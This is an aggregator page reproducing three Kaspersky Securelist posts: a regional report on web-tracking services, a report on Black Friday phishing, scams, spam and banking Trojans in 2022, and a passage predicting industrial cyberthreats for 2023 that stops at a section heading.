Kaspersky Securelist

Syndikovat obsah Securelist
Aktualizace: 23 min 9 sek zpět

Who tracked internet users in 2021–2022

25 Listopad, 2022 - 09:00

Every time you go online, someone is watching over you. The services you use, the websites you visit, the apps on your phone, smart TVs, gaming consoles, and any networked devices collect data on you with the help of trackers installed on web pages or in software. The websites and services send this data to their manufacturers and partners whose trackers they use. Companies are looking for all kinds of information on you: from device specifications to the way you are using a service, and the pages you are opening. Data thus collected primarily helps companies, firstly, to understand their customers better and improve the products by analyzing the user experience, and, secondly, to predict user needs and possibly even manipulate them. Besides, the more an organization knows about you, the better it can personalize ads that it shows you. These ads command higher rates than random ones and therefore generate higher profits.

Understanding who is collecting the data and why requires you to have free time and to know where to look. Most services have published privacy policies, which should ideally explain in detail what data the service collects and why. Sadly, these policies are seldom transparent enough. Worried about this lack of transparency, users and privacy watchdogs put pressure on technology companies. Certain tech giants recently started adding tools to their ecosystems that are meant to improve the data collection transparency. For example, upon the first run of an app downloaded from the App Store, Apple inquires if the user is willing to allow that app to track their activity. However, not every service provides this kind of warnings. You will not see a prompt like that when visiting a website, even if you are doing it on an Apple device.

Browser privacy settings and special extensions that recognize tracking requests from websites and block these can protect you from tracking as you surf the web. That is how our Do Not Track (DNT) extension works. Furthermore, with the user’s consent, DNT collects anonymized data on what tracking requests are being blocked and how frequently. This report will look at companies that collect, analyze, store user data, and share it with partners, as reported by DNT.

Statistics collection principles

This report uses anonymous statistics collected between August 2021 and August 2022 by the Do Not Track component, which blocks loading of web trackers. The statistics consist of anonymized data provided by users voluntarily. We have compiled a list of 25 tracking services that DNT detected most frequently across nine regions and certain individual countries. 100% in each case represents the total number of DNT detections triggered by all 25 tracking services.

DNT (disabled by default) is part of Kaspersky Internet Security, Kaspersky Total Security, and Kaspersky Security Cloud.

Global web tracking giants

Six tracking services made the TOP 25 rankings in each of the regions at hand. Four of them are owned by Google: Google Analytics, Google AdSense, Google Marketing Platform, and YouTube Analytics. The remaining two are owned by Meta and Criteo, which we will cover later.

Google

Our last report, published in 2019, took a close look at Google’s trackers: DoubleClick, Google AdSense, Google Analytics, and YouTube Analytics. This was right around the time when the search giant announced plans to rebrand the DoubleClick advertising platform and merge it with its advertising ecosystem. Today, DoubleClick is part of Google Marketing Platform, although the tracking URLs have not changed and continue to function as before. For convenience, our statistics will refer to that tracking service as “Google Marketing Platform (ex-DoubleClick)”.

Share of DNT detections triggered by Google Marketing Platform (ex-DoubleClick) trackers in each region, August 2021 — August 2022 (download)

Google Marketing Platform (ex-DoubleClick) had its largest shares in our TOP 25 rankings for South Asia (32.92%) and the Middle East (32.84%). These were followed by its shares in Africa and Latin America: 25.37% and 24.64%, respectively. The lowest share (just 7.05%) of Google Marketing Platform (ex-DoubleClick) DNT detections in our regional TOP 25 rankings of the busiest tracking services were observed in the CIS.

A further tracking service operated by Google, Google Analytics, collects data on website visitors and provides detailed statistics to clients. That service, too, accounts for a fairly large share of DNT detections across the world.

Share of DNT detections triggered by Google Analytics trackers in each region, August 2021 — August 2022 (download)

A look at the share of Google Analytics in various regions will reveal a similar pattern to the Google Marketing Platform (ex-DoubleClick). Google Analytics received its largest shares of detections in South Asia (18.04%), Latin America (17.97%), Africa (16.56%) and the Middle East (16.44%). Its smallest share was in the CIS: 9.06%.

Share of DNT detections triggered by Google AdSense trackers in each region, August 2021 — August 2022 (download)

Another tracking system operated by Google is Google AdSense context ad service. This, again, had its highest percentages in the Middle East (5.27%), Africa (4.63%), Latin America (4.44%), and South Asia (4.44%). Here, too, the CIS ranked last with just 1.45% of detections triggered by the service.

Rounding out the list of Google’s tracking services is YouTube Analytics. It provides YouTube bloggers with data on their audiences that its trackers collect and analyze.

Share of DNT detections triggered by YouTube Analytics trackers in each region, August 2021 — August 2022 (download)

The Middle East (8.04%), South Asia (7.79%), Africa (5.97%), and Latin America (5.02%) again accounted for the highest shares of detections. At the bottom of the region list this time around is North America (1.82%), rather than the CIS (2.54%). The low percentage is no indication of YouTube’s insignificant presence in the region. The small share of YouTube Analytics in the region was likely due to fierce competition among services that collect and analyze data. We will revisit this later.

Meta (Facebook)

Facebook Custom Audiences by Meta, which provides targeted advertising services, was present in each of the regions along with Google’s tracking services. Services like that collect various types of user data, analyze these, and segment the audience to ensure better ad targeting. An advertiser who uses a targeting service wins by having their products shown to the people who are the likeliest to be interested. Compared to smaller advertising providers, Facebook Custom Audiences covers a significantly larger audience. Our data shows, however, that Meta was second to Google in terms of presence in all regions of the world.

Share of DNT detections triggered by Facebook Custom Audiences trackers in each region, August 2021 — August 2022 (download)

Facebook Custom Audiences had its largest shares in Latin America (8.76%) and Oceania (7.95%), and its smallest, in the CIS (2.12%). As mentioned above, the modest shares occupied by the global trackers could be linked to serious competition from local data collection and analysis services.

Criteo

The last on the list of tracking services detected in every corner of the world was Criteo. Though a less familiar name than Google or Facebook, Criteo actually is a major French advertising company providing a range of services from collection and analysis of user data to advertising itself.

Share of DNT detections triggered by Criteo trackers in each region, August 2021 —August 2022 (download)

Criteo trackers were most frequently detected in Europe (7.07%), East Asia (6.09%), and Latin America (5.24%), and least frequently, in South Asia (just 1.59%).

Regional landscape

In addition to the tracking services detected everywhere in the world, there were players of comparable size that did appear in most, but not all, TOP 25 rankings and local giants that dominated individual regions or countries. We will cover these below.

Europe

The aforementioned global tracking services held the top three places in Europe: Google Marketing Platform (ex-DoubleClick) (21.39%), Google Analytics (15.23%), and Criteo (7.07%). Facebook Custom Audiences was fifth, with 5.29%, Google AdSense was seventh, with 3.59%, and YouTube Analytics eleventh, with 2.97%. Trackers owned by five other major companies occupied the fourth, sixth, eighth, ninth, and tenth positions in our rankings.

TOP 25 tracking services in Europe, August 2021 — August 2022 (download)

Amazon Technologies, which accounted for 6.31% of total detections associated with prevalent trackers in Europe, stands for trackers operated by Amazon Advertising, an Amazon subsidiary that collects and analyzes user data to help their clients to connect with consumers, in addition to placing ads in all Amazon services. This is essentially a classic advertising giant similar to Google Marketing Platform and Criteo. Amazon trackers will come up more than once in other regional TOP 25 rankings.

Index Exchange, the Canadian-based global advertising marketplace with a 4.12% percent share in Europe, is another such giant.

Bing Ads, with a share of 3.45%, was another tracking service popular in the region. It provides search query analysis and displays ads in the Bing search engine. It was followed by Adloox (3.21%), which we covered in the previous review, and Improve Digital (3.17%), a Dutch advertising platform.

Facebook was the fifteenth most popular tracking service in the region, with 1.96%. This is another Meta service, which tracks Facebook account activity, such as logins and interaction with plugins and Like buttons on other websites. The service features in the TOP 25 almost in every region, with the exception of North America, Russia and Iran.

Certain tracking services, such as Meetrics (DoubleVerify), with a share of 1.28%, and Virtual Minds, with a share of 1.39%, feature in the European TOP 25 only. This is hardly surprising, as both companies are headquartered in Germany.

Africa

The familiar advertising giants occupied the top four positions in Africa. Google Marketing Platform (ex-DoubleClick) had a huge share of 25.37%. Google Analytics was second, with 16.56%. YouTube Analytics and Facebook Custom Audiences were detected in 5.97% and 5.90% of total cases, respectively.

TOP 25 tracking services in Africa, August 2021 — August 2022 (download)

The fifth place was taken by Yahoo Web Analytics, with a share of 4.86%. This is a service that collects and analyzes data on Yahoo users. The presence of Yahoo Web Analytics in a regional TOP 25 is an indication that Yahoo services are popular in that region.

It is worth noting that the African TOP 25 included none of the tracking services popular in that region exclusively.

The Middle East

The six global tracking services occupied the top six positions in the Middle East. Google Marketing Platform (ex-DoubleClick) accounted for almost one-third (32.84%) of the total detections of the region’s most popular tracking services. Google Analytics trackers were detected in 16.44% of cases; YouTube Analytics trackers, in 8.04%; аnd Google AdSense trackers, in 5.27%. Google is evidently the biggest collector of user data in the Middle East.

TOP 25 tracking services in the Middle East, August 2021 — August 2022 (download)

There is a certain country in the region whose TOP 25 statistics we would like to consider separately because of a unique advertising market and hence, an online tracking landscape different from the rest of the Middle East.

Iran

Iran is the only country on our list where Google Analytics accounted for 50.72% of the total detections associated with the 25 leading tracking services. Google Marketing Platform (ex-DoubleClick) accounted for 11.76%.

TOP 25 tracking services in Iran, August 2021 — August 2022 (download)

Iran also has local tracking services that internet users there encounter fairly often. For instance, the advertising agency SabaVision, with a share of 4.62%, was third in the rankings and the advertising platform Yektan was fifth, with 3.90%.

Latin America

The tracking landscape in Latin America was not drastically different from the rest of the world. Again, Google, Facebook, and Criteo occupied the leading positions. They were followed by Yahoo Web Analytics (3.48%), trackers operated by the US analytics company Chartbeat (3.00%), Twitter (2.65%), and Amazon Technologies (2.62%).

TOP 25 tracking services in Latin America, August 2021 — August 2022 (download)

North America

The share of Google’s global tracking services was comparatively small in North America, as the charts in the first part of this report show. Google Marketing Platform (ex-DoubleClick) accounted for 18.22% of total detections in August 2021 — August 2022, which was the second smallest figure in terms of its regional shares. The North American share of YouTube Analytics trackers was their smallest altogether. This was due to the heavy presence of trackers operated by other companies: Amazon Technologies (6.90%), Yahoo Web Analytics (5.67%), and Adloox (5.57%). These companies created a more competitive environment, which resulted in the share of each tracking service in the total DNT detections being smaller.

TOP 25 tracking services in North America, August 2021 — August 2022 (download)

In addition to other regions’ leaders, the North American TOP 25 featured a few that only made the local rankings. Examples included the Canadian advertising ecosystem Sharethrough with a share of 1.99% and the American advertising company The Trade Desk, which accounted for 1.65% of the detections.

Oceania

Every well-known global web tracking service was represented in Oceania. Interestingly enough, Oceania and North America were the only two regions where trackers by Tremor Video, a company that specializes in video advertising, made their way into the TOP 25, with the shares of 1.15% and 2.54%, respectively.

TOP 25 tracking services in Oceania, August 2021 — August 2022 (download)

The CIS

The CIS (Commonwealth of Independent States) is a fairly interesting region that has a variety of local tracking services. It comprises diverse countries, each with its distinctive internet regulations and restrictions, which certainly affects the presence of advertising companies. We will start by looking at the aggregate statistics for the CIS exclusive of Russia, as that country dominates the market, distorting other countries’ statistical data somewhat.

TOP 25 tracking services in the CIS (excluding Russia), August 2021 — August 2022 (download)

The CIS was the only region at hand dominated by a local internet giant, rather than the Google Marketing Platform (ex-DoubleClick). Yandex.Metrika, with a share of 19.24%, topped the rankings of trackers popular in the region. Google’s tracking services occupied second (16.17%) and third (13.14%) places.

The Mediascope research company was fourth, with 5.55%. Besides collecting and analyzing user data for marketing purposes, Mediascope is the organization officially designated to evaluate the size of television channel audiences, and sending reports to Roskomnadzor, Russia’s mass media regulator.

Other tracking services specific to the CIS are the web counter Yadro.ru (4.88%), the ad management platform AdFox (4.68%), Russian ad tech company Buzzoola (3.03%), the ad management and audit service Adriver (2.74%), Between Digital (2.23%), Rambler Internet Holdings (1.95%), VK (ex-Mail.Ru Group, 1.92%), VKontakte (1.86%), AdMixer (1.70%), originally from Russia but now headquartered in London, and Uniontraff.com (1.03%).

Thus, 12 out of 25 most widely used web tracking services in the CIS (exclusive of Russia) were endemic to the market.

Russian Federation

Most of the tracking services that made the TOP 25 in Russia are homegrown. Yandex.Metrika and Mediascope, mentioned above, were first and second, respectively, with 19.73% and 12.51%. Google Analytics (8.83%) and Google Marketing Platform (ex-DoubleClick, 6.59%) occupied the third and fourth positions, their respective shares fairly low in comparison to the Russia-less CIS average of 13.14% and 16.17% respectively. The rest of the top positions went to local Russian tracking services.

TOP 25 tracking services in Russia, August 2021 — August 2022 (download)

East Asia

The East Asian landscape did not differ drastically from the rest of the world. It featured mostly the same tracking services as other parts of the globe. However, there were two exceptions: Japan and Korea. We singled out these countries as separate research entities to demonstrate their distinctive features and the maturity of local advertising companies, which were, by and large, the key user data collectors and analysts there.

Google Marketing Platform (ex-DoubleClick) featured quite prominently in the East Asian TOP 25 rankings with a 27.62% share, followed by Google Analytics (16.13%) and Facebook Custom Audiences (6.65%). YouTube Analytics had a share of 6.54%, and Yahoo Web Analytics, 5.79%.

TOP 25 tracking services in East Asia (excluding Japan and Korea), August 2021 — August 2022 (download)

Japan

Japan is the only country where Twitter trackers had a fairly high share (11.67%), overtaking both Facebook Custom Audiences (4.43%) and YouTube Analytics (3.24%). Similarly to other major social networks, Twitter tracks user activity on other websites in addition to its own. One of the tracking tools is Twitter Pixel, which owners can embed into their websites. Twitter trackers notably featured in the TOP 25 rankings of every region and country covered by the report, with the exception of Russia, where this service is blocked.

TOP 25 tracking services in Japan, August 2021 — August 2022 (download)

In addition to the global companies, the TOP 25 rankings for Japan featured local tracking services. Examples include trackers operated by the Japanese marketing and advertising agencies, such as Digital Advertising Consortium Inc (3.01%), Supership (2,86%), I-mobile (2.13%), AdStir (1.44%), Samurai Factory (0.99%), Logly (0.90%), the blogging platform Ameba (1.47%), and the online services vendor LINE Corporation (0.71%).

South Korea

Like Japan, South Korea is a peculiar region with mature local tech companies, which affects tracker distribution. Google led by a fairly wide margin: Google Marketing Platform (ex-DoubleClick) had a share of 25.49% and Google Analytics 19.74%. Trackers operated by Kakao, Korea’s largest internet company, accounted for as much as 10.90%, pushing it to third place. Kakao’s scale of operations is comparable to Japan’s LINE, Russia’s Yandex or China’s WeChat.

TOP 25 tracking services in South Korea, August 2021 — August 2022 (download)

Other Korean tracking services in the TOP 25 were eBay Korea (2.02%) and the targeted advertising service WiderPlanet (1.77%).

South Asia

The South Asian TOP 25 rankings of web tracking services most frequently detected by DNT looked similar to the general global pattern. As in the Middle East, Google Marketing Platform (ex-DoubleClick) had one of the highest shares globally in South Asia, 32.92%.

TOP 25 tracking services in South Asia, August 2021 — August 2022 (download)

The Indian tech and media giant Times Internet, which was not part of the TOP 25 in any other region of the world, had some presence in South Asia (0.97%).

Conclusion

There are only a few global companies that collect user data in every corner of the world. They are the universally recognized Google and Meta, as well as the advertising giant Criteo, little known to common users. We have seen that the more distinctive the region or country is linguistically, economically, and technologically, the higher the chances are that local companies will have some presence on the market and be able to compete with the global giants. Major local players typically go beyond just advertising and marketing to be providers of diverse online services on their home markets. For example, Korea’s Kakao, Japan’s LINE, and Russia’s Yandex are not just internet giants but key regional services that provide the population with all that it needs: from email and instant messaging to food delivery. As they collect and analyze user data, they naturally pursue the same objectives as the global giants.

Being aware that your online activity is tracked is no fun. Unfortunately, you cannot fully protect yourself against tracking — you can only minimize the amount of data that a company tracking you will obtain. That is also important, though: the less information on you is collected beyond your control, the less painful potential future leakages would be. There are various types of technical tools to protect you from web tracking. For instance, VPN changes your IP address, thus distorting to a degree the digital profile of you that marketing companies strive to build. Anti-tracking browser extensions like DNT block trackers while you surf the web, preventing companies from finding out what websites you use and how. You can also reduce the risk by sharing only the data that services need to function. That will not stop them from collecting your data, but it can significantly reduce the scope of the information that companies have about you.

Black Friday shoppers beware: online threats so far in 2022

23 Listopad, 2022 - 09:00

The shopping event of the year, Black Friday, is almost here, and while the big day does not officially arrive until Friday, November 25th, deals are already starting. The day kickstarts the frenzied holiday shopping season with eye-catching promotional deals that lure shoppers into spending more of their hard-earned cash. In the weeks leading up to Black Friday, we have already seen discounts reaching 70% and even 80%, grabbing the attention of millions of customers.

Today, e-commerce sales make up 21% of global retail sales, which is a 50% increase on the pre-pandemic levels. Besides, 94% of shoppers now do at least some of their shopping online. As the volume of purchases around Black Friday increases, the attention of cybercriminals to e-commerce intensifies proportionally. The risk of being scammed runs even higher. While on ordinary days, the customer can easily see that if the product is too cheap, it is most likely a scam, during the Black Friday sales, it gets harder to tell. Shoppers become less vigilant, and therefore, an easy target for cybercriminals. That is why we constantly monitor the landscape of shopping-related cyberthreats and protect users from these risks. Here is what we have found this year.

Methodology

In this research, we analyze various types of threats, such as financial malware and phishing pages mimicking the world’s biggest retail platforms, banking and payment systems, and discuss recent trends. The threat statistics we use come from Kaspersky Security Network (KSN), a system for processing anonymized cyberthreat-related data shared voluntarily by Kaspersky users, for the period from January through October 2022. In addition, we analyzed Black Friday-related spam and phishing pages mimicking popular BNPL (buy now, pay later) services, which have proven to be particularly popular during shopping seasons like Black Friday.

Key findings

  • Over the first ten months of 2022, Kaspersky prevented 38,596,555 financial phishing attacks.
  • In 2022, the number of attacks using banking Trojans doubled when compared to the same period of 2021, reaching almost 20 million.
  • The number of financial phishing attempts for online shopping platforms (16,424,303) comprised 42.55% of all financial phishing attempts.
  • The number of phishing pages mimicking the most popular shopping platforms (Apple, Amazon, eBay, Walmart, Aliexpress, and Mercado Libre) totaled 12,787,534 in the first ten months of 2022.
  • Apple was consistently the most popular lure among online shopping platforms, with phishing attempts using its name reaching 9,858,254 in the first ten months of 2022.
  • Spam campaigns intensify as Black Friday approaches. In the first three weeks of November, Kaspersky telemetry spotted 351,800 spam emails that contained the word combination “Black Friday”. This is five times more than September’s figure.
Phishing for shopping credentials: financial threats in numbers

One of the prime threats during the shopping season is financial phishing. Kaspersky distinguishes several types of financial phishing: banking, payment system, and online store phishing. Banking phishing includes fake banking websites that cybercriminals create to mislead their victims into giving up their credentials and card details. Payment system phishing involves pages mimicking well-known payment systems, such as PayPal, Visa, MasterCard and American Express. The third type of phishing mimics online stores, such as Amazon, eBay, Aliexpress, or smaller ones.

Number of attempts to visit phishing pages using banking, online payment and online retail brands as a lure, January–October 2022 (download)

During the first ten months of 2022, Kaspersky products detected 38,596,555 phishing attacks targeting users of online shopping platforms, payment systems and banking institutions. We count one attempt to open a phishing link detected by Kaspersky as one phishing attack. During the first ten months of this year, the number of financial phishing attempts for online shopping platforms comprised 42.55% of all financial phishing attempts, which is 10.19 p.p. higher than the share of online payment phishing (32.36%), and 17.47 p.p. higher than the share of banking phishing (25.08%). Moreover, some of the payment system and banking phishing cases may be related to online store phishing. For example, if a phishing or scam page mimicking Amazon redirects the user to a payment page mimicking PayPal, these two pages will be categorized as online store and payment system phishing, respectively. In total, Kaspersky solutions detected 16,424,303 online store phishing attacks, 12,491,239 online payment phishing attacks, and 9,681,013 banking phishing attempts. We also observed a sharp spike in the number of attacks on online store users in June–July 2022. This was caused by a massive phishing campaign involving a fake Apple device giveaway, which Kaspersky security solutions successfully repelled.

Number of attempts to visit phishing pages using Apple as a lure, January–October 2022 (download)

Overall, the number of phishing attacks mimicking the most popular shopping platforms (Apple, Amazon, eBay, Walmart, Aliexpress, and Mercado Libre) amounted to 12,787,534 for the ten months of 2022. The majority of these attacks targeted Apple users: 9,858,254 phishing attempts, most of them occurring during the summer campaign mentioned above.

Number of attempts to visit phishing pages using popular shopping platforms (excluding Apple) as a lure in 2022 (download)

Amazon was the second most popular lure, with phishing attempts using its name peaking in April at 342,829. In total, 2,101,599 phishing attacks exploiting the Amazon brand were detected between January and October of 2022. The third most popular lure was, for most of 2022, Mercado Libre. Although the marketplace is local to Latin America, cybercriminals notably abused it much more via phishing attacks than global corporations like eBay or Walmart. Specifically, attackers used the brand name of Mercado Libre most heavily during the summer season, with 56,099 attempts in June and 42,862 in August, which is more than the summer figures for eBay, Walmart, and Aliexpress. Curiously, the number of phishing sites mimicking Walmart’s platform peaked in February, likely because of Valentine’s Day. During that month, we detected 76,618 phishing attempts abusing Walmart, which is 45% of all phishing attempts that targeted Walmart users in the first ten months of 2022.

“Pick a prize and cry in surprise”

A large share of fake e-commerce pages comprises scams: juicy fake offers, often made in the name of a popular brand, which draw buyers. Scam websites will typically display a discount, giveaway or another attractive deal that supposedly expires soon, urging the user to hurry while the products are free or heavily discounted. This is where cybercriminals catch customers who are hungry for freebies and fail to double-check where they are about to enter their details: on a phishing page or the official website.

A brightly colored phishing site with a Mercado Libre logo on it lights up with, “Pick a prize and cry in surprise” written in Spanish. The surprise box can contain anything: the latest iPhone, an expensive TV set, or a much-needed lawn mower for the garden. To get it, the user just needs to pay a small delivery fee. However, all they really get if they fall for the trick is their money lost and bank card details compromised.

Fake Mercado Libre site in Spanish that reads, “Pick a prize and cry in surprise”

Cybercriminals often start to spread phishing and scam pages even before Black Friday sales begin in order to squeeze out the shopping season as much as possible. One scam site, for example, offers users early access to all Amazon deals a few days before the discounts become effective, to grab everything they want before other customers sweep the shelves. To get the “early access”, you have to subscribe to “Amazon Prime” on the scammers’ website. However, paying for the subscription will not get users access to Amazon’s offers. Instead of being the first among buyers, they will join the ranks of scam victims.

Users are offered early access to Amazon sales

In addition to promises of early access, attackers use other tricks to lure victims. For example, they offer eBay gift cards for free. In order to generate a gift card code, users are asked to select an amount to add to the gift card account: from $10 to $300. They will then be asked to fill out a simple survey and to pay a small fee for the card, which the scammers promise to send by email. However, victims will not get any gift cards, but just lose their money to the scammers.

Victims are promised that gift card codes will be sent to their emails, which does not happen

A promise of cashback is another kind of bait used by cyberthieves. That is how they lured victims into a phishing scheme that targeted users of the Indian payment system PhonePe. The attackers sent out text messages promising cashback to users who followed a link. The phishing page urged victims to enter their UPI PIN: the secret code that is used to confirm transactions.

Fake cashback page phishing for UPI PINs

In certain cases, cybercriminals exploited several brands with one phishing page. On the screenshot below, the fake website mimics the login page for Landesbank Berlin’s Amazon.de cards. It offers users to “activate Visa Secure to pay safely with their Amazon.de Visa card”. To do that, the victim needs to enter their Landesbank Berlin login credentials, which will then be stolen by the attackers.

Users are prompted to log in to their Landesbank Berlin account to allegedly activate Visa Secure option

“Buy now, regret later”: phishing examples for BNPL services

“Buy now, pay later” (BNPL) services allow customers to split the cost of a purchase into several interest-free installments. These services appeal to consumers, especially youngsters, and have proven to be particularly popular during shopping days like Black Friday. Juniper Research assesses the BNPL user base at 360 million in 2022 and predicts this number to surpass 900 million globally by 2027. All of this makes BNPL an attractive target for cybercriminals.

BNPL phishing on the eve of Black Friday 2022

One of the most popular BNPL services is Affirm, with around 12.7 million active users worldwide. According to the official website, a user can shop online or in-store and pay later with the service at checkout. Another option is to request a virtual card in the app. Payments are managed in the app or online. The service offers a browser extension for Chrome.

Cybercriminals have created a nearly perfect replica of the official Affirm login page—the only difference is missing links to the privacy policy and merchant login. By creating the malicious lookalike, the attackers are trying to gain access to victims’ Affirm accounts.

Affirm phishing page

The real Affirm login page (Differences highlighted)

Another pre-Black Friday phishing site found by Kaspersky researchers spoofs an even more popular service named Afterpay (Clearpay in the U.K. and Italy), which has 20 million active users globally. Perpetrators have set up a page that mimics the official website, apparently trying to trick unsuspecting visitors into entering their bank card details, including the CVV, into a fake form.

A further example of a phishing page mimicking Afterpay is aimed at gaining access to potential victims’ accounts.

Phishing distribution

To attract potential victims to phishing pages, attackers usually send links to these pages by email. The email body employs social engineering techniques, for instance, to convince the user that they need to update their payment data, or that a lucrative deal awaits them on the phishing site. However, there are other ways of delivering phishing links, such as instant messages, social media, or SMS.

Phishing and scam: red flags

More often than not, a vigilant user can recognize phishing and scam pages. The text on the page can contain typos, while the domain name in the URL can differ from that of the official website by a few characters, contain extra words, or look totally unrelated to the brand whose users it targets. The only functional buttons are often those related to the main phishing or scam functionality: “pick your prize”, submit buttons, etc. All other buttons such as “I forgot my password”, the menu, etc. are typically unclickable or lead nowhere. That said, links to the terms of use and privacy policy in the footer of a phishing page can lead to the documents published on the original website, and thus help to conceal the website’s malicious purpose.

Spam

Despite all the benefits of online shopping, one of its most annoying downsides is finding your inbox clogged up with unsolicited email. Spam campaigns tend to intensify dramatically around the shopping and holiday seasons. From November 1 through November 17, 2022, Kaspersky telemetry recorded 351,800 emails containing the word combination “Black Friday”. This is more than five times the number of such emails recorded in October, when we saw 65,608. Compared to September, the increase is more than 32 times.

The number of spam emails containing “Black Friday”; September, October, and November 2022 (download)

When left unfiltered by antispam systems, spam is an annoyance and a waste of time. Our recent study revealed that employees who receive 30–60 external emails per day could be wasting as much as 11 hours annually looking through and identifying spam messages. For employees receiving between 60–100 emails a day, the figure increases to 18 hours per year, which is more than two business days.

Additionally, an important email might be lost in a deluge of spam and unintentionally deleted. Needless to say, many spam emails contain links to phishing and scam websites, or malicious attachments.

Banking Trojans go after payment credentials

Banking Trojans (bankers) are a staple in the arsenal of cyberthieves who seek to profit from the sales season. These are malicious computer programs that obtain access to confidential information stored or processed by online banking and payment systems. Bankers use webinjects and form-grabbing functionality to steal credentials, card details, or even all of the data a user enters on the target website.

After a sharp drop in banking Trojan attacks in 2021, cybercriminals reverted to using the tool heavily: from January through October 2022, Kaspersky products detected and prevented almost 20 million attacks, a 92% increase year on year.

Overall number of banking Trojan attacks, January–October 2020–2022 (download)

Conclusion

The shopping season is a profitable time not just for stores owners and consumers but also for cybercrooks. Every year, we see how fraudsters step up their activities amid the sales season by exploiting the names of popular stores, retail platforms and financial services. Unfortunately, the trend is not likely to go anywhere. This means users should be prepared and know how to stay protected at least from the “traditional” types of threats we observe every year: spam, phishing, and banking Trojans.

To enjoy the best that Black Friday has to offer this year, be sure to follow a few safety tips.

  • Protect all devices that you use for online shopping with a reliable security solution.
  • Do not trust any links or attachments received by email; double-check the sender’s name and email address before opening anything.
  • Check that the online store address is correct and the page has no errors or visual defects on it before filling out any forms there.
  • In order to protect your data and finances, it is a safe practice to make sure the checkout page is secure, and there is a locked padlock icon beside the address.
  • If you want to buy something from an unfamiliar company, check customer reviews before making the decision.
  • Despite taking as many precautions as possible, you probably will not know whether something is amiss until you see your bank account statement. So, if you are still getting paper statements, do not wait until they hit your mailbox. Get online to see if all of the charges look legitimate, and if not, contact your bank or card issuer immediately.

ICS cyberthreats in 2023 – what to expect

22 Listopad, 2022 - 09:00

Cybersecurity incidents were plentiful in 2022, causing many problems for industrial infrastructure owners and operators. However, luckily, we did not see any sudden or catastrophic changes in the overall threat landscape – none that were difficult to handle, despite many colorful headlines in the media.

As we see it, the coming year looks to be much more complicated. Many people may be surprised by unexpected twists and turns, though we should already be examining these eventualities today. Below we share some of our thoughts on potential developments of 2023, though we cannot claim to be providing either a complete picture or a high degree of precision.

As we analyze the events of 2022, we must profess that we have entered an era where the most significant changes in the threat landscape for industrial enterprises and OT infrastructures are mostly determined by geopolitical trends and the related macroeconomic factors.

Cybercriminals are naturally cosmopolitan; however, they do pay close attention to political and economic trends as they chase easy profits and ensure their personal safety.

APT activity, which is traditionally ascribed to intelligence agencies of various governments, always occurs in line with developments in foreign policy and the changing goalposts inside countries and inter-governmental blocks.

Developments in the APT world

Internal and external political changes will deliver new directions for APT activity.

Changes in attack geography

Attack geography will inevitably change following transformations of existing and the emergence of new tactical and strategic alliances. As alliances shift, we see cybersecurity tensions arise between countries where such tensions had never existed. Yesterday’s allies become today’s targets.

Changes in industry focus

We are going to see APT activity change the focus on specific industries very soon because the evolving geopolitical realities are closely intertwined with economic changes. Therefore, we should soon see attacks targeting the following sectors representing the real economy:

  • Agriculture, manufacturing of fertilizers, agricultural machinery and food products – all as a result of upcoming food crises and shifting food markets;
  • Logistics and transport (including transportation of energy resources) due to the on-going changes in global logistics chains;
  • The energy sector, mining and processing of mineral resources, non-ferrous and ferrous metallurgy, chemical industry, shipbuilding, instrument and machine-tool manufacturing, as the availability of these companies’ products and technologies is part of the foundation for the economic security of both individual countries and political alliances;
  • The alternative energy sector, specifically where it is on the geopolitical agenda;
  • High-tech, pharmaceuticals and medical equipment producers, since these are integral for ensuring technological independence.
Continuing attacks on traditional targets

Naturally, we will still see APT attacks on traditional targets, with the main APT attack focus definitely including:

  • enterprises in the military industrial complex, with geopolitical tensions, confrontations escalating to red alert status, along with the rising possibilities of military confrontations being the main drivers for the attackers;
  • the government sector – we expect attacks to focus on information gathering regarding government initiatives and projects related to the growth of industrial sectors of the economy;
  • critical infrastructure – attacks aiming to gain a foothold for future use, and sometimes, for instance when conflicts between specific countries are in the “hot” phase, the goal may even be to inflict immediate and direct damage.
Other changes in the threat landscape

Other important changes in the threat landscape which we already see and which we believe will increasingly contribute to the overall picture include the following:

  • A rising number of hacktivists “working” to internal and external political agendas. These attacks will garner more results – quantity will begin to morph into quality.
  • A growing risk of volunteer ideologically and politically motivated insiders, as well as insiders working with criminal (primarily ransomware) and APT groups – both at enterprises and among technology developers and vendors.
  • Ransomware attacks on critical infrastructure will become more likely – under the auspices of hostile countries or in countries unable to respond effectively to attacks by attacking the adversary’s infrastructure and conducting a full-blown investigation leading to a court case.
  • Cybercriminals’ hands will be untied by degrading communications between law enforcement agencies from different countries and international cooperation in cybersecurity grinding to a halt, enabling threat actors to freely attack targets in ‘hostile’ countries. This applies to all types of cyberthreats and is a danger for enterprises in all sectors and for all types of OT infrastructure.
  • Criminal credential harvesting campaigns will increase in response to the growing demand for initial access to enterprise systems.
Risk factors due to geopolitical ebb and flow

The current situation forces industrial organizations into making an extremely complicated choice – which products and from which vendors should they be using and why.

On the one hand, we are seeing failing trust relationships in supply chains for both products and services (including OEM), which in turn increases the risks in using many of the products companies are used to:

  • It becomes more difficult to deploy security updates when vendors end support for products or leave the market.
  • This is equally applicable to degrading quality of security solutions when regular updates cease due to security vendors leaving the market.
  • We cannot totally rule out the possibility of political pressure being applied to weaponize products, technologies and services of some minor market players. When it comes to global market leaders and respected vendors, however, we believe this to be extremely unlikely.

On the other hand, searching for alternative solutions can be extremely complicated. Products from local vendors, whose secure development culture, as we have often found, is usually significantly inferior to that of global leaders, are likely to have ‘silly’ security errors and zero-day vulnerabilities, rendering them easy prey for both cybercriminals and hacktivists.

Organizations based in countries where the political situation does not require addressing the above issues, should still consider the risk factors which affect everyone:

  • The quality of threat detection decreases as IS developers lose some markets, resulting in the expected loss of some of their qualified IS experts. This is a real risk factor for all security vendors experiencing political pressure.
  • The communication breakdowns between IS developers and researchers located on opposite sides of the new ‘iron curtain’ or even on the same side (due to increased competition on local markets) will undoubtedly decrease the detection rates of security solutions that are currently being developed.
  • Decreasing CTI quality – unfounded politically motivated cyberthreat attribution, exaggerated threats, lower statement validity criteria due to political pressure and in an attempt to utilize the government’s political narrative to earn additional profits.
  • Government attempts to consolidate information about incidents, threats and vulnerabilities and to limit access to this information detract from overall awareness, since information may sometimes be kept under wraps without good reasons.

    And at the same time, this results in an increased risk of confidential data leaks (example: PoC of an RCE published by mistake in a national vulnerability database). This issue could be addressed by building broad cybersecurity capacity in the public sector to ensure that responsible treatment of sensitive cybersecurity information and efficient coordinated vulnerability disclosure can always be guaranteed.

  • Additional IS risks due to the growing role of governments in the operations of industrial enterprises, including connections to government clouds and services, which may sometimes be less protected than some of the best private ones.
Additional technical and technological risk factors
